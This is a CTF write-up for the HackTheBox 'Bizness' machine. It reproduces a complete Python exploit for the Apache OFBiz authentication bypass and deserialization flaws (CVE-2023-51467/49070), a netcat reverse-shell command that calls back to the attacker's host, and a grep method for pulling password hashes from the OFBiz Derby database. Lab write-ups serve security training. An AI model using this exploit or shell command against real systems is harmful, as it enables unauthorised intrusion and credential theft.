Bizness Writeup

Initial Reconnaissance: Nmap Scan

Before running any scans, I like to store the target machine’s IP address in a file:

$ echo "10.129.216.214" >> ip

This way, I can easily retrieve the IP whenever needed using $(cat ip). Let’s run the Nmap scan:

$ sudo nmap -sS -sV -sC -p- $(cat ip) -oN nmap/bizness.out

Breakdown of the command

• -sS: TCP SYN scan (half-open scan).
• -sV: Enable version detection.
• -sC: Run default Nmap scripts.
• -p-: Scan all 65535 ports.
• $(cat ip): Retrieve the target IP address from the ip file.
• -oN nmap/bizness.out: Output results to nmap/bizness.out in normal format.

Results

# Nmap 7.94SVN scan initiated Tue Jul 30 17:32:23 2024 as: nmap -sS -sV -sC -p- -oN nmap/bizness.out 10.129.216.214
Nmap scan report for 10.129.216.214
Host is up (0.024s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp    open  http       nginx 1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
|_http-server-header: nginx/1.18.0
443/tcp   open  ssl/http   nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|_  http/1.1
|_http-title: Did not follow redirect to https://bizness.htb/
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after:  2328-11-10T20:03:40
42873/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jul 30 17:33:24 2024 -- 1 IP address (1 host up) scanned in 60.51 seconds

The results shows 4 ports are open.

• 22/tcp ssh
• 80/tcp http
• 443/tcp ssl/https

We can also see that port 80 is redirecting us to the bizness.htb domain. so lets add this to our /etc/hosts.

$ sudo su
$ echo "$(cat ip)    bizness.htb" >> /etc/hosts
$ exit

and we can test whether we can reach the domain or not by pinging it.

$ ping bizness.htb -c 3
PING bizness.htb (10.129.216.214) 56(84) bytes of data.
64 bytes from bizness.htb (10.129.216.214): icmp_seq=1 ttl=63 time=22.9 ms
64 bytes from bizness.htb (10.129.216.214): icmp_seq=2 ttl=63 time=26.8 ms
64 bytes from bizness.htb (10.129.216.214): icmp_seq=3 ttl=63 time=24.9 ms

--- bizness.htb ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/

Directory and Subdomain Enumeration

Having modified our /etc/hosts file, we can now conveniently access the target machine’s web server by navigating to https://bizness.htb in our web browser. Examining the website, we find limited interactivity, suggesting potential client-side rendering or a static website.

Since the initial web page doesn’t offer much in terms of user input or hidden functionalities, we’ll shift our focus to directory enumeration. This technique aims to identify hidden or unlinked directories on the web server that might contain sensitive information.

Directory Enumeration Reveals OFBiz Logins

Keep in mind that after visiting the web-page, we get redirected to 443 which is HTTPS. this means to run the Directory Enumeration successfully, we would need to target port 443 instead of 80.

We’ve now explored the initial web page at https://bizness.htb and discovered it offers limited interaction. To have a better look, we can run dirb to find other directories we might be able to access.

$ dirb https://bizness.htb

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Jul 30 17:49:27 2024
URL_BASE: https://bizness.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://bizness.htb/ ----
==> DIRECTORY: https://bizness.htb/accounting/
==> DIRECTORY: https://bizness.htb/ap/
==> DIRECTORY: https://bizness.htb/ar/
==> DIRECTORY: https://bizness.htb/catalog/
==> DIRECTORY: https://bizness.htb/common/
==> DIRECTORY: https://bizness.htb/content/
+ https://bizness.htb/control (CODE:200|SIZE:34633)
==> DIRECTORY: https://bizness.htb/ebay/
==> DIRECTORY: https://bizness.htb/ecommerce/
+ https://bizness.htb/error (CODE:302|SIZE:0)
==> DIRECTORY: https://bizness.htb/example/
==> DIRECTORY: https://bizness.htb/images/
+ https://bizness.htb/index.html (CODE:200|SIZE:27200)
==> DIRECTORY: https://bizness.htb/marketing/
==> DIRECTORY: https://bizness.htb/passport/

# This scan was going for a long time as its recursive. 
# I stopped it for the sake of keeping this code snippet short. 
# Feel free to let it run.

Dirb successfully identified several directories on the target web server, including:

• /accounting/
• /ap/
• /ar/

OFBiz on Bizness.htb

Visiting some of these discovered directories redirects us to a login page for OFBiz.

OFBiz (Open For Business) is an open-source enterprise resource planning (ERP) software suite.

Looking closer at the login page, we noticed a version number listed in the bottom left corner. Copyright (c) 2001-2024 The Apache Software Foundation. Powered by Apache OFBiz. Release 18.12 With some quick research on this specific OFBIZ version, we discovered a critical vulnerability (CVE-2023-51467 and CVE-2023-49070) reported very recently. This vulnerability allows attackers to bypass authentication and potentially gain unauthorised access to the system, even allowing for a reverse shell!

Successfully Establishing a Connection

Exploiting the OFBIZ Vulnerability

There are plenty of Proof of Concept exploits available on github. doing a quick search took us to a repository caclled Apache-OFBiz-Authentication-Bypass

I think this is a very neat exploit to work with as its using a relatively readable python script so that we can understand how the exploit works.

lets have a look at the code.

Looking into how the exploit works

xdetection.py

# Import necessary libraries
import argparse   # Provides a command-line argument parsing functionality
import requests   # Allows sending HTTP requests
import urllib3    # Manages HTTP connections and enables SSL verification

# Disable SSL verification warnings to prevent warnings about unverified HTTPS requests.
# This is generally not recommended for production code as it bypasses SSL security checks.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def validate_url(url):
    """
    Validates that the given URL starts with the proper schema ('http://' or 'https://').
    If not, it raises a ValueError to indicate the URL is invalid.

    Args:
        url (str): The URL to validate.

    Raises:
        ValueError: If the URL does not start with 'http://' or 'https://'.
    """
    if not url.startswith("http://") and not url.startswith("https://"):
        raise ValueError("Invalid URL schema. Use 'http://' or 'https://'.")

def scan(url):
    """
    Scans the provided URL to check if an Apache OFBiz instance is vulnerable to specific CVEs.

    Args:
        url (str): The base URL of the Apache OFBiz instance.

    Side Effects:
        Prints out the status of the scan indicating if the instance is vulnerable or not.
    """
    print("[+] Scanning started...")

    try:
        # Construct the target URL for the vulnerability check.
        # This endpoint is specific to Apache OFBiz and the CVEs mentioned.
        target_url = f"{url}/webtools/control/ping?USERNAME=&PASSWORD=&requirePasswordChange=Y"

        # Send a GET request to the constructed URL with SSL verification disabled.
        response = requests.get(target_url, verify=False)

        # Check if the HTTP response was successful (status code 200-299).
        # Raises an HTTPError if the response contains an error status code.
        response.raise_for_status()

        # Check if the response body contains "PONG", which indicates the server
        # is likely vulnerable as it is responding to the ping command.
        if "PONG" in response.text:
            print("[+] Apache OFBiz instance seems to be vulnerable.")
        else:
            print("[-] Apache OFBiz instance seems NOT to be vulnerable.")

    except requests.exceptions.RequestException as e:
        # Catch any exceptions related to the HTTP request, such as connection errors,
        # timeouts, or invalid responses, and print an error message.
        print(f"[-] LOG: An error occurred during the scan: {e}")

def main():
    """
    The main entry point of the script. Parses command-line arguments and starts the scan.
    """
    # Initialize the argument parser with a description of the script.
    parser = argparse.ArgumentParser(description="Detection script for Apache EFBiz auth vulnerability (CVE-2023-49070 and CVE-2023-51467).")

    # Define a required command-line argument '--url' for the URL to be scanned.
    parser.add_argument("--url", required=True, help="EFBIZ's URL to send requests to.")

    # Parse the command-line arguments and store them in 'args'.
    args = parser.parse_args()

    # Remove any trailing slashes from the URL to ensure consistent URL formation.
    url = args.url.rstrip('/')

    # Validate the URL schema to ensure it's either 'http://' or 'https://'.
    validate_url(args.url)

    # Start the vulnerability scan on the validated URL.
    scan(url)

# If the script is executed as the main program, invoke the main function.
if __name__ == "__main__":
    main()

• Imports:
  • argparse: This module allows the script to accept command-line arguments, making it more flexible and user-friendly.
  • requests: This library simplifies sending HTTP requests and handling responses.
  • urllib3: Used here to manage SSL-related warnings and is a part of requests.
• Disabling SSL Warnings:
  • The line urllib3.disable_warnings(...) is used to suppress warnings related to unverified HTTPS requests. This is useful for debugging but should be handled with caution in production due to potential security risks.
• validate_url Function:
  • This function checks if the URL begins with the correct schema (http:// or https://). It raises a ValueError if the schema is invalid, ensuring that users provide a well-formed URL.
• scan Function:
  • Constructs a target URL specifically for the Apache OFBiz vulnerability check.
  • Sends a GET request to the constructed URL with SSL verification turned off.
  • Analyzes the server’s response to determine if it contains the string “PONG,” indicating a potential vulnerability.
  • Handles HTTP exceptions, printing a message if an error occurs during the request.
• main Function:
  • Sets up argument parsing with argparse to allow users to specify the URL of the Apache OFBiz instance they want to scan.
  • Validates the provided URL and then proceeds with the scanning process.
• if __name__ == "__main__" Block:
  • Ensures that the main() function is only executed if the script is run directly, not when imported as a module.

exploit.py

# Import necessary libraries
import argparse   # For parsing command-line arguments
import logging    # For logging error messages and debugging information
import os         # Provides functions for interacting with the operating system
import subprocess # To execute shell commands from within the script
import base64     # For encoding and decoding binary data
import requests   # Simplifies sending HTTP requests
import urllib3    # Handles HTTP connections and SSL settings

# Disable SSL verification warning for simplicity.
# This suppresses warnings about unverified HTTPS requests.
# In production code, SSL verification should not be disabled to maintain security.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def validate_url(url):
    """
    Validate the URL schema to ensure it starts with 'http://' or 'https://'.
    Args:
        url (str): The URL to validate.
    Raises:
        ValueError: If the URL does not start with the correct schema.
    """
    if not url.startswith("http://") and not url.startswith("https://"):
        raise ValueError("Invalid URL schema. Use 'http://' or 'https://'.")

def scan(url):
    """
    Perform a basic vulnerability scan on the specified URL.
    Checks if the Apache OFBiz instance is vulnerable to the ping request exploit.

    Args:
        url (str): The base URL of the Apache OFBiz instance to scan.
    """
    print("[+] Scanning started...")
    try:
        # Construct the URL for the vulnerability check endpoint.
        # This specific endpoint is known to be vulnerable to certain Apache OFBiz exploits.
        target_url = f"{url}/webtools/control/ping?USERNAME=&PASSWORD=&requirePasswordChange=Y"
        
        # Send a GET request to the target URL, disabling SSL verification.
        response = requests.get(target_url, verify=False)

        # Raise an HTTPError if the HTTP response contains a 4xx or 5xx status code.
        response.raise_for_status()

        # Check if the response text contains "PONG", indicating a vulnerability.
        if "PONG" in response.text:
            print("[+] Apache OFBiz instance seems to be vulnerable.")
        else:
            print("[-] Apache OFBiz instance seems NOT to be vulnerable.")

    except requests.exceptions.RequestException as e:
        # Catch and log any exceptions that occur during the HTTP request.
        print(f"[-] LOG: An error occurred during the scan: {e}")

def get_encoded_payload(cmd):
    """
    Generate a base64 encoded payload using ysoserial for Java deserialization exploits.

    Args:
        cmd (str): The command to be executed on the remote server.

    Returns:
        str: A base64 encoded string representing the serialized payload.

    Exits:
        If the 'ysoserial-all.jar' file is not found, it logs an error and exits the program.
    """
    # Check if the ysoserial JAR file is present in the current directory.
    if not os.path.isfile("ysoserial-all.jar"):
        logging.error("[-] ysoserial-all.jar not found. Exiting.")
        exit(1)

    print("[+] Generating payload...")
    try:
        # Run the command to generate a serialized payload using ysoserial.
        # 'subprocess.run' executes the command, capturing its output.
        result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, text=False)

        # Base64 encode the serialized payload produced by ysoserial.
        # The result is converted to a base64-encoded string.
        encoded_output = base64.b64encode(result.stdout).decode().replace("\n", "")
        print("[+] Payload generated successfully.")

    except subprocess.CalledProcessError as e:
        # Catch and log any errors that occur during the subprocess execution.
        print(f"[-] LOG: An error occurred during payload generation: {e}")

    return encoded_output

def send_post_request(url, encoded_output):
    """
    Send a POST request containing a malicious serialized payload to the server.

    Args:
        url (str): The base URL of the target server.
        encoded_output (str): The base64 encoded payload to send in the request.
    """
    print("[+] Sending malicious serialized payload...")
    try:
        # Construct the URL for the target XML-RPC endpoint.
        target_url = f"{url}/webtools/control/xmlrpc/?USERNAME=&PASSWORD=&requirePasswordChange=Y"

        # Define the headers for the POST request, specifying the content type as XML.
        headers = {
            "Content-Type": "application/xml",
        }

        # Construct the XML payload containing the base64-encoded serialized object.
        # This payload is crafted to exploit deserialization vulnerabilities.
        xml_data = f"""<?xml version="1.0"?>
            <methodCall>
              <methodName>Methodname</methodName>
              <params>
                <param>
                  <value>
                    <struct>
                      <member>
                        <name>test</name>
                        <value>
                          <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">{encoded_output}</serializable>
                        </value>
                      </member>
                    </struct>
                  </value>
                </param>
              </params>
            </methodCall>
        """

        # Send the POST request to the target URL with the XML data and headers.
        response = requests.post(target_url, headers=headers, data=xml_data, verify=False)

        # Check the response status code to determine if the request was successful.
        if response.status_code == 200:
            print("[+] The request has been successfully sent. Check the result of the command.")
        else:
            print("[-] Failed to send the request. Check the connection or try again.")
    except requests.exceptions.RequestException as e:
        # Catch and log any exceptions that occur during the HTTP request.
        print(f"[-] LOG: An error occurred during the scan: {e}")

def main():
    """
    Main function for executing the script.
    Parses command-line arguments and performs either a scan or an exploit attempt.
    """
    # Set up an argument parser with a description of the script's purpose.
    parser = argparse.ArgumentParser(description="Exploit script for Apache EFBiz auth vulnerability (CVE-2023-49070 and CVE-2023-51467).")

    # Define a required command-line argument '--url' for the target URL.
    parser.add_argument("--url", required=True, help="EFBIZ's URL to send requests to.")

    # Define an optional command-line argument '--cmd' for the command to run on the remote server.
    parser.add_argument("--cmd", help="Command to run on the remote server. Optional.")

    # Parse the command-line arguments and store them in 'args'.
    args = parser.parse_args()

    # Remove any trailing slashes from the URL to ensure consistent URL formation.
    url = args.url.rstrip('/')

    # Validate the URL schema to ensure it's properly formatted.
    validate_url(args.url)

    # If no command is provided, perform a basic scan of the target URL.
    if args.cmd is None:
        scan(url)
    else:
        # Construct the command to generate a serialized payload using ysoserial.
        command = f"java -jar --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED ysoserial-all.jar CommonsBeanutils1 '{args.cmd}'"

        # Generate a base64-encoded payload from the command.
        encoded_output = get_encoded_payload(command)

        # Send the malicious payload in a POST request to the target URL.
        send_post_request(url, encoded_output)

# Execute the main function if the script is run directly.
if __name__ == "__main__":
    main()

• Imports:
  • The script imports various modules to handle command-line arguments, logging, file operations, subprocess management, encoding, and HTTP requests. Each module serves a specific purpose in executing the script’s functionality.
• SSL Warning Suppression:
  • urllib3.disable_warnings() is used to suppress SSL verification warnings, which can clutter the output. However, this approach reduces security, and SSL verification should be enabled in production environments to prevent Man-In-The-Middle (MITM) attacks.
• validate_url Function:
  • This function ensures that the provided URL starts with http:// or https://. It raises a ValueError if the schema is invalid, preventing further execution with an incorrect URL.
• scan Function:
  • The script checks if the Apache OFBiz instance responds to a specific ping request endpoint. A response containing “PONG” suggests a potential vulnerability, as the endpoint should not be publicly accessible.
• get_encoded_payload Function:
  • This function generates a base64-encoded payload using ysoserial, a tool for generating payloads that exploit Java deserialization vulnerabilities. It runs a Java command to create a serialized payload, which is then base64-encoded for use in the exploit.
• send_post_request Function:
  • Sends a POST request to the target server containing the encoded payload. This request attempts to exploit a deserialization vulnerability in the Apache OFBiz instance, potentially executing the provided command on the server.
• main Function:
  • Sets up command-line argument parsing to allow the user to specify the target URL and an optional command to run. If no command is provided, the script performs a basic scan; otherwise, it attempts to exploit the server using the specified command.
• Command-Line Arguments:
  • --url: Specifies the target URL for the scan or exploit.
  • --cmd: (Optional) Specifies the command to execute on the remote server if the exploit is attempted.

---

Running the Exploit

to run the exploit we simply need to clone the git repository and run the exploit file. Firstly, we can check if the target is vulnerable to this attack by running the following command:

$ python exploit.py --url https://bizness.htb
[+] Scanning started ...
[+] Apache OFBiz instance seems to be vulnerable.

The outcome indicates that our target is vulnerable to this attack and we are likely to obtain a shell through this.

To exploit this system to our advantage, we need a listener running..

Netcat Listener

in order to obtain the shell, we are going to run a reverse shell command. this command essentially establishes the shell by initiating the connection from the targets end instead of our end. we are no longer accessing an available service on the target and asking for a shell, we are forcing the target system to establish a shell with us. to do so we need a listener set up to hear out for the connection.

I have been experimenting with a python based tool named Penelope however in order to minimise automation in this walk through we will use Netcat as our listener. personally i like Penelope only for its automatic shell upgrade which we will cover after accessing the shell.

to set up a listener with Netcat, run the following command:

$ nc -nvlp [port number]

Running the exploit.

to run the exploit, you need the following command:

$ python exploit.py --url https://bizness.htb --cmd 'nc [your_ip] [port number] -c bash'

here you are running python with targets URL and the command you like to run on target system. for us this will be a Netcat command to establish a reverse shell with our listener.

once the exploit is executesd, we can check out listener to see if it’s received the conneciton.

$ whoami
ofbiz

Improving Shell Efficiency

As you can see, the shell is so clunky its barely usable, the arrow keys dont work and you cant clear the terminal. chances us changing your terminals window size could break the character alignment and make the text unreadable. to overcome this, we can upgrade our shell on this system using python:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Next, we’ll send the shell to the background using Ctrl+Z and run:

stty raw -echo; fg

Now, define our Terminal emulator with:

export TERM=xterm

With these adjustments, our shell becomes more responsive, allowing for easier navigation and command recall.

User flag

Let’s search for the user flag. Typically, it’s located in the home directory, making it easy to find. Let’s check:

we can do this by listing the home directory with

ofbiz@bizness:/opt/ofbiz$ ls ~/
user.txt

And there you have it—the user flag is right there, waiting to be discovered.

Privilege Escalation

I examined the system using Linpeas and tried several kernel privilege escalation exploits, but didn’t have any luck. After some online research, I couldn’t find a solution, so I turned to other resources about this box. According to the write-up I found at https://techyrick.com/bizness-hackthebox-writeup/, to escalate your privileges, you need to search through the OFBiz folder where you’ve landed the shell and find a user password, which is stored in SHA1. There’s no easy shortcut—you just have to get familiar with OFBiz.

to find the SHA1 hash, you can use the below command after navigating to the derby database directory.

cd /opt/ofbiz/runtime/data/derby/ofbiz/seg0/
grep -arin -o -E '(\w+\w){0,5}password(\W+\w){0,5}' .

Let’s break down the command:

1. grep: This is the command-line utility used for searching text patterns in files.
2. -a: This flag tells grep to treat binary files as text files, allowing it to search through them.
3. -r: This flag stands for “recursive”, meaning it will search through all files and directories recursively, starting from the current directory (.).
4. -i: This flag makes the search case-insensitive, so it will match “password”, “Password”, “PASSWORD”, etc.
5. -n: This flag tells grep to print the line numbers of matching lines along with the lines themselves.
6. -o: This flag instructs grep to only print the matched parts of a line, rather than the entire line.
7. -E: This flag enables extended regular expressions, allowing for more complex pattern matching.
8. '(\w+\w){0,5}password(\W+\w){0,5}': This is the pattern we’re searching for. Let’s break it down further:
   • (\w+\w): This part matches one or more word characters (alphanumeric characters plus underscore), repeated twice. This allows for matching words like “admin123” or “user_567”.
   • {0,5}: This quantifier specifies that the preceding pattern should be repeated between 0 and 5 times. So, (pattern){0,5} matches from 0 to 5 occurrences of the pattern.
   • password: This is the literal string “password” that we’re searching for.
   • (\W+\w): This part matches one or more non-word characters (anything other than alphanumeric characters or underscore) followed by one or more word characters, repeated once. This allows for matching strings like “password123!” or “password_abc”.
   • {0,5}: Similar to before, this quantifier specifies that the preceding pattern should be repeated between 0 and 5 times.
9. .: This specifies the directory to search in. In this case, it’s the current directory (.).

and if we look through the file we can see below:

./c54d0.dat:21:password="$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I" enabled